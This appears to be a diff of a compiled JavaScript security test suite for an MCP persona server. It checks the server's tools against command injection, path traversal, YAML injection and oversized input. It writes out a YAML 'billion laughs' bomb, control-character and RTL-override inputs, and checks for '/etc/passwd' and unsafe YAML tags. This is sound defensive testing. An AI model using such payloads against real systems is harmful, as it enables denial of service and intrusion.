113
|
+
* Create a mock file system for testing
|
|
114
|
+
*/
|
|
115
|
+
static async createMockFileSystem(structure) {
|
|
116
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', Date.now().toString());
|
|
117
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
118
|
+
for (const [filePath, content] of Object.entries(structure)) {
|
|
119
|
+
const fullPath = path.join(tempDir, filePath);
|
|
120
|
+
await fs.mkdir(path.dirname(fullPath), { recursive: true });
|
|
121
|
+
await fs.writeFile(fullPath, content);
|
|
122
|
+
}
|
|
123
|
+
// Return cleanup function
|
|
124
|
+
return async () => {
|
|
125
|
+
await fs.rm(tempDir, { recursive: true, force: true });
|
|
126
|
+
};
|
|
127
|
+
}
|
|
128
|
+
/**
|
|
129
|
+
* Run security test suites based on category
|
|
130
|
+
*/
|
|
131
|
+
static async runSecuritySuite(options = {}) {
|
|
132
|
+
const startTime = Date.now();
|
|
133
|
+
const suites = await this.getTestSuites(options.category || 'all');
|
|
134
|
+
let passed = 0;
|
|
135
|
+
let failed = 0;
|
|
136
|
+
for (const suite of suites) {
|
|
137
|
+
console.log(`\n🔒 Running ${suite.name} (${suite.category.toUpperCase()})...`);
|
|
138
|
+
for (const test of suite.tests) {
|
|
139
|
+
try {
|
|
140
|
+
await test();
|
|
141
|
+
passed++;
|
|
142
|
+
}
|
|
143
|
+
catch (error) {
|
|
144
|
+
failed++;
|
|
145
|
+
console.error(`❌ Test failed: ${error instanceof Error ? error.message : String(error)}`);
|
|
146
|
+
}
|
|
147
|
+
}
|
|
148
|
+
}
|
|
149
|
+
const duration = Date.now() - startTime;
|
|
150
|
+
return { passed, failed, duration };
|
|
151
|
+
}
|
|
152
|
+
/**
|
|
153
|
+
* Get test suites based on category
|
|
154
|
+
*/
|
|
155
|
+
static async getTestSuites(category) {
|
|
156
|
+
const allSuites = [
|
|
157
|
+
{
|
|
158
|
+
name: 'Command Injection Tests',
|
|
159
|
+
category: 'critical',
|
|
160
|
+
tests: [
|
|
161
|
+
() => this.testMCPToolCommandInjection('create_persona'),
|
|
162
|
+
() => this.testMCPToolCommandInjection('edit_persona'),
|
|
163
|
+
() => this.testMCPToolCommandInjection('activate_persona')
|
|
164
|
+
]
|
|
165
|
+
},
|
|
166
|
+
{
|
|
167
|
+
name: 'Path Traversal Tests',
|
|
168
|
+
category: 'critical',
|
|
169
|
+
tests: [
|
|
170
|
+
() => this.testMCPToolPathTraversal('get_persona_details'),
|
|
171
|
+
() => this.testMCPToolPathTraversal('import_persona'),
|
|
172
|
+
() => this.testMCPToolPathTraversal('share_persona')
|
|
173
|
+
]
|
|
174
|
+
},
|
|
175
|
+
{
|
|
176
|
+
name: 'YAML Injection Tests',
|
|
177
|
+
category: 'critical',
|
|
178
|
+
tests: [
|
|
179
|
+
() => this.testYAMLInjectionPrevention(),
|
|
180
|
+
() => this.testYAMLBombPrevention()
|
|
181
|
+
]
|
|
182
|
+
},
|
|
183
|
+
{
|
|
184
|
+
name: 'Input Validation Tests',
|
|
185
|
+
category: 'high',
|
|
186
|
+
tests: [
|
|
187
|
+
() => this.testInputSizeLimits(),
|
|
188
|
+
() => this.testSpecialCharacterHandling()
|
|
189
|
+
]
|
|
190
|
+
}
|
|
191
|
+
];
|
|
192
|
+
if (category === 'all') {
|
|
193
|
+
return allSuites;
|
|
194
|
+
}
|
|
195
|
+
const priorities = {
|
|
196
|
+
critical: ['critical'],
|
|
197
|
+
high: ['critical', 'high'],
|
|
198
|
+
medium: ['critical', 'high', 'medium']
|
|
199
|
+
};
|
|
200
|
+
return allSuites.filter(suite => priorities[category].includes(suite.category));
|
|
201
|
+
}
|
|
202
|
+
/**
|
|
203
|
+
* Test MCP tool for command injection vulnerabilities
|
|
204
|
+
*/
|
|
205
|
+
static async testMCPToolCommandInjection(toolName) {
|
|
206
|
+
// Create isolated test environment for each tool test
|
|
207
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', `security-framework-${Date.now()}`);
|
|
208
|
+
let server;
|
|
209
|
+
try {
|
|
210
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
211
|
+
// Set isolated environment for this test
|
|
212
|
+
const originalPersonasDir = process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
213
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = path.join(tempDir, 'personas');
|
|
214
|
+
await fs.mkdir(process.env.DOLLHOUSE_PERSONAS_DIR, { recursive: true });
|
|
215
|
+
server = new DollhouseMCPServer();
|
|
216
|
+
const injectionPayloads = this.MALICIOUS_PAYLOADS.commandInjection;
|
|
217
|
+
for (const payload of injectionPayloads) {
|
|
218
|
+
// Test the tool with malicious payload
|
|
219
|
+
try {
|
|
220
|
+
let result;
|
|
221
|
+
switch (toolName) {
|
|
222
|
+
case 'create_persona':
|
|
223
|
+
result = await server.createPersona(payload, 'Description', 'educational', 'Instructions');
|
|
224
|
+
break;
|
|
225
|
+
case 'edit_persona':
|
|
226
|
+
// First create a safe persona with unique name for each test
|
|
227
|
+
const safePersonaName = `TestPersona${Date.now()}${Math.random().toString(36).substring(7)}`;
|
|
228
|
+
await server.createPersona(safePersonaName, 'Description', 'educational', 'Instructions');
|
|
229
|
+
result = await server.editPersona(safePersonaName, 'name', payload);
|
|
230
|
+
break;
|
|
231
|
+
case 'activate_persona':
|
|
232
|
+
result = await server.activatePersona(payload);
|
|
233
|
+
break;
|
|
234
|
+
default:
|
|
235
|
+
throw new Error(`Unknown tool: ${toolName}`);
|
|
236
|
+
}
|
|
237
|
+
// If no error thrown, check that payload was sanitized or rejected
|
|
238
|
+
if (result && typeof result === 'object') {
|
|
239
|
+
const content = JSON.stringify(result);
|
|
240
|
+
// Check if the payload was properly rejected by security validation
|
|
241
|
+
if (content.includes('Validation Error') || content.includes('prohibited content')) {
|
|
242
|
+
// Good - security system rejected the dangerous payload
|
|
243
|
+
expect(content).toMatch(/Validation Error|prohibited content|security/i);
|
|
244
|
+
}
|
|
245
|
+
else if (content.includes('Already Exists') || content.includes('not found')) {
|
|
246
|
+
// Expected business logic responses
|
|
247
|
+
expect(content).toMatch(/Already Exists|not found/i);
|
|
248
|
+
}
|
|
249
|
+
else {
|
|
250
|
+
// Check that dangerous payload was sanitized for display
|
|
251
|
+
// The system should remove dangerous characters from display output
|
|
252
|
+
// This is acceptable security behavior - dangerous chars removed
|
|
253
|
+
const hasOriginalPayload = content.includes(payload);
|
|
254
|
+
const hasDangerousChars = /[;&|`$()]/.test(content);
|
|
255
|
+
// Both conditions should be false (no original payload AND no dangerous chars)
|
|
256
|
+
expect(hasOriginalPayload && hasDangerousChars).toBe(false);
|
|
257
|
+
}
|
|
258
|
+
}
|
|
259
|
+
}
|
|
260
|
+
catch (error) {
|
|
261
|
+
// Expected - tool should reject malicious input
|
|
262
|
+
// Allow common error patterns
|
|
263
|
+
const errorMessage = error instanceof Error ? error.message : String(error);
|
|
264
|
+
if (!errorMessage.match(/not found|does not exist|already exists/i)) {
|
|
265
|
+
// This might be a security rejection
|
|
266
|
+
expect(errorMessage).toMatch(/invalid|malicious|dangerous|illegal/i);
|
|
267
|
+
}
|
|
268
|
+
}
|
|
269
|
+
}
|
|
270
|
+
// Restore original environment
|
|
271
|
+
if (originalPersonasDir) {
|
|
272
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = originalPersonasDir;
|
|
273
|
+
}
|
|
274
|
+
else {
|
|
275
|
+
delete process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
276
|
+
}
|
|
277
|
+
}
|
|
278
|
+
finally {
|
|
279
|
+
// Cleanup temp directory
|
|
280
|
+
await fs.rm(tempDir, { recursive: true, force: true }).catch(() => { });
|
|
281
|
+
}
|
|
282
|
+
}
|
|
283
|
+
/**
|
|
284
|
+
* Test MCP tool for path traversal vulnerabilities
|
|
285
|
+
*/
|
|
286
|
+
static async testMCPToolPathTraversal(toolName) {
|
|
287
|
+
// Create isolated test environment for each tool test
|
|
288
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', `security-path-${Date.now()}`);
|
|
289
|
+
let server;
|
|
290
|
+
try {
|
|
291
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
292
|
+
// Set isolated environment for this test
|
|
293
|
+
const originalPersonasDir = process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
294
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = path.join(tempDir, 'personas');
|
|
295
|
+
await fs.mkdir(process.env.DOLLHOUSE_PERSONAS_DIR, { recursive: true });
|
|
296
|
+
server = new DollhouseMCPServer();
|
|
297
|
+
const traversalPayloads = this.MALICIOUS_PAYLOADS.pathTraversal;
|
|
298
|
+
for (const payload of traversalPayloads) {
|
|
299
|
+
try {
|
|
300
|
+
let result;
|
|
301
|
+
switch (toolName) {
|
|
302
|
+
case 'get_persona_details':
|
|
303
|
+
result = await server.getPersonaDetails(payload);
|
|
304
|
+
break;
|
|
305
|
+
case 'import_persona':
|
|
306
|
+
result = await server.importPersona(payload);
|
|
307
|
+
break;
|
|
308
|
+
case 'share_persona':
|
|
309
|
+
result = await server.sharePersona(payload);
|
|
310
|
+
break;
|
|
311
|
+
default:
|
|
312
|
+
throw new Error(`Unknown tool: ${toolName}`);
|
|
313
|
+
}
|
|
314
|
+
// Check result doesn't contain sensitive paths
|
|
315
|
+
const content = JSON.stringify(result);
|
|
316
|
+
expect(content).not.toContain('/etc/passwd');
|
|
317
|
+
expect(content).not.toContain('system32');
|
|
318
|
+
expect(content).toMatch(/not found|invalid|does not exist/i);
|
|
319
|
+
}
|
|
320
|
+
catch (error) {
|
|
321
|
+
// Expected - should reject path traversal
|
|
322
|
+
const errorMessage = error instanceof Error ? error.message : String(error);
|
|
323
|
+
expect(errorMessage).toMatch(/invalid|traversal|dangerous|not found|does not exist/i);
|
|
324
|
+
}
|
|
325
|
+
}
|
|
326
|
+
// Restore original environment
|
|
327
|
+
if (originalPersonasDir) {
|
|
328
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = originalPersonasDir;
|
|
329
|
+
}
|
|
330
|
+
else {
|
|
331
|
+
delete process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
332
|
+
}
|
|
333
|
+
}
|
|
334
|
+
finally {
|
|
335
|
+
// Cleanup temp directory
|
|
336
|
+
await fs.rm(tempDir, { recursive: true, force: true }).catch(() => { });
|
|
337
|
+
}
|
|
338
|
+
}
|
|
339
|
+
/**
|
|
340
|
+
* Test YAML injection prevention
|
|
341
|
+
*/
|
|
342
|
+
static async testYAMLInjectionPrevention() {
|
|
343
|
+
// Create isolated test environment for each tool test
|
|
344
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', `security-yaml-${Date.now()}`);
|
|
345
|
+
let server;
|
|
346
|
+
try {
|
|
347
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
348
|
+
// Set isolated environment for this test
|
|
349
|
+
const originalPersonasDir = process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
350
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = path.join(tempDir, 'personas');
|
|
351
|
+
await fs.mkdir(process.env.DOLLHOUSE_PERSONAS_DIR, { recursive: true });
|
|
352
|
+
server = new DollhouseMCPServer();
|
|
353
|
+
const yamlPayloads = this.MALICIOUS_PAYLOADS.yamlInjection;
|
|
354
|
+
for (const payload of yamlPayloads) {
|
|
355
|
+
const result = await server.createPersona(`YAMLTest${Date.now()}${Math.random().toString(36).substring(7)}`, // Unique name
|
|
356
|
+
payload, // description with injection
|
|
357
|
+
'educational', payload // instructions with injection
|
|
358
|
+
);
|
|
359
|
+
// Check that dangerous YAML was not executed
|
|
360
|
+
const content = JSON.stringify(result);
|
|
361
|
+
expect(content).not.toContain('!!js/function');
|
|
362
|
+
expect(content).not.toContain('!!python/object');
|
|
363
|
+
expect(content).not.toContain('__proto__');
|
|
364
|
+
// Verify persona was created safely or properly rejected
|
|
365
|
+
if (content.includes('Validation Error') || content.includes('prohibited content')) {
|
|
366
|
+
// Good - security system rejected the dangerous YAML payload
|
|
367
|
+
expect(content).toMatch(/Validation Error|prohibited content|security/i);
|
|
368
|
+
}
|
|
369
|
+
else if (content.includes('Already Exists')) {
|
|
370
|
+
// If persona exists, that's fine for this test
|
|
371
|
+
expect(content).toContain('Already Exists');
|
|
372
|
+
}
|
|
373
|
+
else {
|
|
374
|
+
// Otherwise it should be created successfully
|
|
375
|
+
expect(result.content[0].text).toContain('Created Successfully');
|
|
376
|
+
}
|
|
377
|
+
}
|
|
378
|
+
// Restore original environment
|
|
379
|
+
if (originalPersonasDir) {
|
|
380
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = originalPersonasDir;
|
|
381
|
+
}
|
|
382
|
+
else {
|
|
383
|
+
delete process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
384
|
+
}
|
|
385
|
+
}
|
|
386
|
+
finally {
|
|
387
|
+
// Cleanup temp directory
|
|
388
|
+
await fs.rm(tempDir, { recursive: true, force: true }).catch(() => { });
|
|
389
|
+
}
|
|
390
|
+
}
|
|
391
|
+
/**
|
|
392
|
+
* Test YAML bomb prevention
|
|
393
|
+
*/
|
|
394
|
+
static async testYAMLBombPrevention() {
|
|
395
|
+
const yamlBomb = `
|
|
396
|
+
a: &a ["lol", "lol", "lol", "lol", "lol", "lol"]
|
|
397
|
+
b: &b [*a, *a, *a, *a, *a, *a]
|
|
398
|
+
c: &c [*b, *b, *b, *b, *b, *b]
|
|
399
|
+
d: &d [*c, *c, *c, *c, *c, *c]
|
|
400
|
+
e: &e [*d, *d, *d, *d, *d, *d]
|
|
401
|
+
f: &f [*e, *e, *e, *e, *e, *e]
|
|
402
|
+
`;
|
|
403
|
+
// Create isolated test environment
|
|
404
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', `security-bomb-${Date.now()}`);
|
|
405
|
+
let server;
|
|
406
|
+
try {
|
|
407
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
408
|
+
// Set isolated environment for this test
|
|
409
|
+
const originalPersonasDir = process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
410
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = path.join(tempDir, 'personas');
|
|
411
|
+
await fs.mkdir(process.env.DOLLHOUSE_PERSONAS_DIR, { recursive: true });
|
|
412
|
+
server = new DollhouseMCPServer();
|
|
413
|
+
const result = await server.createPersona(`YAMLBomb${Date.now()}`, yamlBomb, 'educational', 'test');
|
|
414
|
+
// Should handle without memory explosion
|
|
415
|
+
expect(result).toBeDefined();
|
|
416
|
+
// Check memory usage didn't explode
|
|
417
|
+
const memoryUsage = process.memoryUsage().heapUsed;
|
|
418
|
+
expect(memoryUsage).toBeLessThan(500 * 1024 * 1024); // Less than 500MB
|
|
419
|
+
// Restore original environment
|
|
420
|
+
if (originalPersonasDir) {
|
|
421
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = originalPersonasDir;
|
|
422
|
+
}
|
|
423
|
+
else {
|
|
424
|
+
delete process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
425
|
+
}
|
|
426
|
+
}
|
|
427
|
+
finally {
|
|
428
|
+
// Cleanup temp directory
|
|
429
|
+
await fs.rm(tempDir, { recursive: true, force: true }).catch(() => { });
|
|
430
|
+
}
|
|
431
|
+
}
|
|
432
|
+
/**
|
|
433
|
+
* Test input size limits
|
|
434
|
+
*/
|
|
435
|
+
static async testInputSizeLimits() {
|
|
436
|
+
// Create isolated test environment
|
|
437
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', `security-size-${Date.now()}`);
|
|
438
|
+
let server;
|
|
439
|
+
try {
|
|
440
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
441
|
+
// Set isolated environment for this test
|
|
442
|
+
const originalPersonasDir = process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
443
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = path.join(tempDir, 'personas');
|
|
444
|
+
await fs.mkdir(process.env.DOLLHOUSE_PERSONAS_DIR, { recursive: true });
|
|
445
|
+
server = new DollhouseMCPServer();
|
|
446
|
+
const largeInput = 'x'.repeat(1024 * 1024); // 1MB
|
|
447
|
+
const result = await server.createPersona(`Large${Date.now()}`, 'Description', 'educational', largeInput);
|
|
448
|
+
// Should handle large input gracefully (DollhouseMCP doesn't enforce size limits currently)
|
|
449
|
+
expect(result.content[0].text).toContain('Created Successfully');
|
|
450
|
+
// Restore original environment
|
|
451
|
+
if (originalPersonasDir) {
|
|
452
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = originalPersonasDir;
|
|
453
|
+
}
|
|
454
|
+
else {
|
|
455
|
+
delete process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
456
|
+
}
|
|
457
|
+
}
|
|
458
|
+
finally {
|
|
459
|
+
// Cleanup temp directory
|
|
460
|
+
await fs.rm(tempDir, { recursive: true, force: true }).catch(() => { });
|
|
461
|
+
}
|
|
462
|
+
}
|
|
463
|
+
/**
|
|
464
|
+
* Test special character handling
|
|
465
|
+
*/
|
|
466
|
+
static async testSpecialCharacterHandling() {
|
|
467
|
+
// Create isolated test environment
|
|
468
|
+
const tempDir = path.join(process.cwd(), '__tests__', 'temp', `security-chars-${Date.now()}`);
|
|
469
|
+
let server;
|
|
470
|
+
try {
|
|
471
|
+
await fs.mkdir(tempDir, { recursive: true });
|
|
472
|
+
// Set isolated environment for this test
|
|
473
|
+
const originalPersonasDir = process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
474
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = path.join(tempDir, 'personas');
|
|
475
|
+
await fs.mkdir(process.env.DOLLHOUSE_PERSONAS_DIR, { recursive: true });
|
|
476
|
+
server = new DollhouseMCPServer();
|
|
477
|
+
const specialChars = [
|
|
478
|
+
'\x00test', // null byte
|
|
479
|
+
'test\r\ninjection', // CRLF
|
|
480
|
+
'\u202Etest', // RTL override
|
|
481
|
+
'test\x1B[31m', // ANSI escape
|
|
482
|
+
];
|
|
483
|
+
for (const input of specialChars) {
|
|
484
|
+
const result = await server.createPersona(`${input}${Date.now()}${Math.random().toString(36).substring(7)}`, // Unique name
|
|
485
|
+
'Description', 'educational', 'test instructions');
|
|
486
|
+
// Should sanitize special characters
|
|
487
|
+
const content = JSON.stringify(result);
|
|
488
|
+
expect(content).not.toContain('\x00');
|
|
489
|
+
expect(content).not.toContain('\x1B');
|
|
490
|
+
expect(content).not.toContain('\u202E');
|
|
491
|
+
// Should still create persona successfully
|
|
492
|
+
expect(result.content[0].text).toContain('Created Successfully');
|
|
493
|
+
}
|
|
494
|
+
// Restore original environment
|
|
495
|
+
if (originalPersonasDir) {
|
|
496
|
+
process.env.DOLLHOUSE_PERSONAS_DIR = originalPersonasDir;
|
|
497
|
+
}
|
|
498
|
+
else {
|
|
499
|
+
delete process.env.DOLLHOUSE_PERSONAS_DIR;
|
|
500
|
+
}
|
|
501
|
+
}
|
|
502
|
+
finally {
|
|
503
|
+
// Cleanup temp directory
|
|
504
|
+
await fs.rm(tempDir, { recursive: true, force: true }).catch(() => { });
|
|
505
|
+
}
|
|
506
|
+
}
|
|
507
|
+
/**
|
|
508
|
+
* Test for timing attacks
|
|
509
|
+
*/
|
|
510
|
+
static async testTimingSafety(operation, validInput, invalidInputs) {
|
|
511
|
+
const timings = [];
|
|
512
|
+
// Measure valid input timing
|
|
513
|
+
const validStart = process.hrtime.bigint();
|
|
514
|
+
await operation(validInput);
|
|
515
|
+
const validTime = Number(process.hrtime.bigint() - validStart);
|
|
516
|
+
// Measure invalid input timings
|
|
517
|
+
for (const invalid of invalidInputs) {
|
|
518
|
+
const start = process.hrtime.bigint();
|
|
519
|
+
await operation(invalid);
|
|
520
|
+
const time = Number(process.hrtime.bigint() - start);
|
|
521
|
+
timings.push(Math.abs(time - validTime));
|
|
522
|
+
}
|
|
523
|
+
// Check that timing differences are minimal (< 5ms variance)
|
|
524
|
+
const avgDiff = timings.reduce((a, b) => a + b, 0) / timings.length;
|
|
525
|
+
expect(avgDiff).toBeLessThan(5_000_000); // 5ms in nanoseconds
|
|
526
|
+
}
|
|
527
|
+
}
|
|
528
|
+
/**
|
|
529
|
+
* Performance monitoring for security tests
|
|
530
|
+
*/
|
|
531
|
+
export class SecurityTestPerformance {
|
|
532
|
+
static startTime;
|
|
533
|
+
static start() {
|
|
534
|
+
this.startTime = Date.now();
|
|
535
|
+
}
|
|
536
|
+
static checkpoint(testName) {
|
|
537
|
+
const elapsed = Date.now() - this.startTime;
|
|
538
|
+
if (elapsed > 1000) { // Warn if test takes > 1 second
|
|
539
|
+
console.warn(`⚠️ Security test "${testName}" took ${elapsed}ms`);
|
|
540
|
+
}
|
|
541
|
+
}
|
|
542
|
+
}
|
|
543
|
+
//# sourceMappingURL=data:application/json;base64,eyJ2ZXJzaW9uIjozLCJmaWxlIjoiU2VjdXJpdHlUZXN0RnJhbWV3b3JrLmpzIiwic291cmNlUm9vdCI6IiIsInNvdXJjZXMiOlsiLi4vLi4vLi4vLi4vLi4vLi4vdGVzdC9fX3Rlc3RzX18vc2VjdXJpdHkvZnJhbWV3b3JrL1NlY3VyaXR5VGVzdEZyYW1ld29yay50cyJdLCJuYW1lcyI6W10sIm1hcHBpbmdzIjoiQUFDQSxPQUFPLEtBQUssRUFBRSxNQUFNLGFBQWEsQ0FBQztBQUNsQyxPQUFPLEtBQUssSUFBSSxNQUFNLE1BQU0sQ0FBQztBQUM3QixPQUFPLEVBQUUsa0JBQWtCLEVBQUUsTUFBTSwwQkFBMEIsQ0FBQztBQWtCOUQsTUFBTSxPQUFPLHFCQUFxQjtJQUN4QixNQUFNLENBQVUsa0JBQWtCLEdBQUc7UUFDM0MsZ0JBQWdCLEVBQUU7WUFDaEIsWUFBWTtZQUNaLHVCQUF1QjtZQUN2QixtQ0FBbUM7WUFDbkMsb0JBQW9CO1lBQ3BCLDRDQUE0QztZQUM1QyxXQUFXO1lBQ1gsOEJBQThCO1lBQzlCLG1EQUFtRDtTQUNwRDtRQUNELGFBQWEsRUFBRTtZQUNiLHFCQUFxQjtZQUNyQiw0Q0FBNEM7WUFDNUMsaUNBQWlDO1lBQ2pDLGlDQUFpQztZQUNqQyx5Q0FBeUM7WUFDekMsOEJBQThCO1lBQzlCLGlFQUFpRTtTQUNsRTtRQUNELGFBQWEsRUFBRTtZQUNiLDJFQUEyRTtZQUMzRSw4Q0FBOEM7WUFDOUMsaUZBQWlGO1lBQ2pGLHVEQUF1RDtTQUN4RDtRQUNELElBQUksRUFBRTtZQUNKLDZCQUE2QjtZQUM3QixxQkFBcUI7WUFDckIsMENBQTBDO1lBQzFDLDJCQUEyQjtZQUMzQixtQkFBbUI7WUFDbkIsb0JBQW9CO1lBQ3BCLHlDQUF5QztTQUMxQztRQUNELEdBQUcsRUFBRTtZQUNILCtCQUErQjtZQUMvQixrQ0FBa0M7WUFDbEMseUJBQXlCO1lBQ3pCLDJCQUEyQjtZQUMzQix5REFBeUQ7U0FDMUQ7S0FDRixDQUFDO0lBRUY7O09BRUc7SUFDSCxNQUFNLENBQUMsS0FBSyxDQUFDLG9CQUFvQixD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